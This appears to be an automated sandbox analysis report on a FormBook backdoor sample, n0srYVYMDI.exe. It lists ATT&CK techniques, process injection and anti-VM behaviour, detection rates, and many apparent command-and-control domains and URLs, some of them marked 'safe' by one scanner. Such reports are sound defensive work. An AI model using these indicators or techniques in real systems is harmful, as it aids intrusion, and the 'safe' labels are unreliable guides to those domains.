          Obfuscated Files or Information          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
          Software Packing          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          DLL Side-Loading          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587617 Sample: n0srYVYMDI.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 www.armanshop.xyz 2->30 32 www.wistlnc.net 2->32 34 10 other IPs or domains 2->34 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 46 7 other signatures 2->46 11 n0srYVYMDI.exe 3 2->11         started        signatures3 44 Performs DNS queries to domains with low reputation 30->44 process4 file5 28 C:\Users\user\AppData\...\n0srYVYMDI.exe.log, ASCII 11->28 dropped 56 Tries to detect virtualization through RDTSC time measurements 11->56 58 Injects a PE file into a foreign processes 11->58 60 Switches to a custom stack to bypass stack traces 11->60 15 n0srYVYMDI.exe 11->15         started        signatures6 process7 signatures8 62 Modifies the context of a thread in another process (thread injection) 15->62 64 Maps a DLL or memory area into another process 15->64 66 Sample uses process hollowing technique 15->66 68 2 other signatures 15->68 18 explorer.exe 58 1 15->18 injected process9 dnsIp10 36 www.vitor.live 103.224.212.213, 50007, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 18->36 21 cmd.exe 18->21         started        process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 54 Switches to a custom stack to bypass stack traces 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          n0srYVYMDI.exe71%VirustotalBrowse
          n0srYVYMDI.exe83%ReversingLabsWin32.Backdoor.FormBook
          n0srYVYMDI.exe100%AviraTR/AD.Swotter.wffxr
          n0srYVYMDI.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.wistlnc.net0%Avira URL Cloudsafe
          http://www.39474.club0%Avira URL Cloudsafe
          http://www.uy-smart-tv-nl.today/m25s/www.vitor.live0%Avira URL Cloudsafe
          http://www.ransportationmwmptpro.top/m25s/0%Avira URL Cloudsafe
          http://www.39474.club/m25s/www.oches-a-credito-es.bond0%Avira URL Cloudsafe
          http://www.armanshop.xyz/m25s/www.ehills.shop0%Avira URL Cloudsafe
          http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bond0%Avira URL Cloudsafe
          http://www.uy-smart-tv-nl.todayReferer:0%Avira URL Cloudsafe
          http://www.raceg.cyouReferer:0%Avira URL Cloudsafe
          http://www.raceg.cyou/m25s/www.cctofi.cpa0%Avira URL Cloudsafe
          http://www.ransportationmwmptpro.topReferer:0%Avira URL Cloudsafe
          http://www.wistlnc.net/m25s/0%Avira URL Cloudsafe
          http://www.uy-smart-tv-nl.today/m25s/0%Avira URL Cloudsafe
          http://www.wistlnc.net/m25s/www.armanshop.xyz0%Avira URL Cloudsafe
          www.ehills.shop/m25s/0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zone0%Avira URL Cloudsafe
          http://www.newordforpurpose.info0%Avira URL Cloudsafe
          http://www.ehills.shop/m25s/0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zoneReferer:0%Avira URL Cloudsafe
          http://www.ealthcare-trends-60670.bond/m25s/0%Avira URL Cloudsafe
          http://www.onnorbell.design0%Avira URL Cloudsafe
          http://www.oches-a-credito-es.bond0%Avira URL Cloudsafe
          http://www.ental-health-69511.bond/m25s/0%Avira URL Cloudsafe
          http://www.xewaov.xyz/m25s/www.39474.club0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.top0%Avira URL Cloudsafe
          http://www.ransportationmwmptpro.top0%Avira URL Cloudsafe
          http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.info0%Avira URL Cloudsafe
          http://www.vitor.live/m25s/www.raceg.cyou0%Avira URL Cloudsafe
          http://www.oches-a-credito-es.bond/m25s/0%Avira URL Cloudsafe
          http://www.armanshop.xyz/m25s/0%Avira URL Cloudsafe
          http://www.onnorbell.designReferer:0%Avira URL Cloudsafe
          http://www.ehills.shop/m25s/www.uy-smart-tv-nl.today0%Avira URL Cloudsafe
          http://www.39474.clubReferer:0%Avira URL Cloudsafe
          http://www.cctofi.cpa0%Avira URL Cloudsafe
          http://www.cctofi.cpaReferer:0%Avira URL Cloudsafe
          http://www.ental-health-69511.bond0%Avira URL Cloudsafe
          http://www.uy-smart-tv-nl.today0%Avira URL Cloudsafe
          http://www.oches-a-credito-es.bondReferer:0%Avira URL Cloudsafe
          http://www.newordforpurpose.info/m25s/0%Avira URL Cloudsafe
          http://www.wistlnc.netReferer:0%Avira URL Cloudsafe
          http://www.ental-health-69511.bondReferer:0%Avira URL Cloudsafe
          http://www.xewaov.xyz0%Avira URL Cloudsafe
          http://www.ehills.shop0%Avira URL Cloudsafe
          http://www.vitor.liveReferer:0%Avira URL Cloudsafe
          http://www.onnorbell.design/m25s/0%Avira URL Cloudsafe
          http://www.cctofi.cpa/m25s/0%Avira URL Cloudsafe
          http://www.ealthcare-trends-60670.bondReferer:0%Avira URL Cloudsafe
          http://www.orean-course-289113002.zone/m25s/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.vitor.live
          		103.224.212.213
          		truetrue
            		unknown
            www.armanshop.xyz
            		unknown
            		unknowntrue
              		unknown
              www.uy-smart-tv-nl.today
              		unknown
              		unknowntrue
                		unknown
                www.onnorbell.design
                		unknown
                		unknowntrue
                  		unknown
                  www.ehills.shop
                  		unknown
                  		unknowntrue
                    		unknown
                    www.raceg.cyou
                    		unknown
                    		unknowntrue
                      		unknown
                      www.wistlnc.net
                      		unknown
                      		unknowntrue
                        		unknown
                        www.cctofi.cpa
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ealthcare-trends-60670.bond
                          		unknown
                          		unknowntrue
                            		unknown
                            www.orean-course-289113002.zone
                            		unknown
                            		unknowntrue
                              		unknown
                              www.ransportationmwmptpro.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ental-health-69511.bond
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  www.ehills.shop/m25s/true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bondexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ransportationmwmptpro.top/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.uy-smart-tv-nl.today/m25s/www.vitor.liveexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.armanshop.xyz/m25s/www.ehills.shopexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wistlnc.netexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/designersn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.uy-smart-tv-nl.todayReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://excel.office.comexplorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.39474.club/m25s/www.oches-a-credito-es.bondexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.39474.clubexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.raceg.cyou/m25s/www.cctofi.cpaexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.raceg.cyouReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.sajatypeworks.comn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/cThen0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.wistlnc.net/m25s/www.armanshop.xyzexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ransportationmwmptpro.topReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.wistlnc.net/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.orean-course-289113002.zoneexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.uy-smart-tv-nl.today/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/DPleasen0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.ehills.shop/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.newordforpurpose.infoexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000003.3495294226.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.urwpp.deDPleasen0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.zhongyicts.com.cnn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.ealthcare-trends-60670.bond/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.orean-course-289113002.zoneReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://wns.windows.com/Lexplorer.exe, 00000003.00000002.4180055463.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.oches-a-credito-es.bondexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://word.office.comexplorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.onnorbell.designexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.xewaov.xyz/m25s/www.39474.clubexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.ental-health-69511.bond/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.infoexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.ransportationmwmptpro.topexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.topexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.armanshop.xyz/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.oches-a-credito-es.bond/m25s/explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.carterandcone.comln0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmln0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.vitor.live/m25s/www.raceg.cyouexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
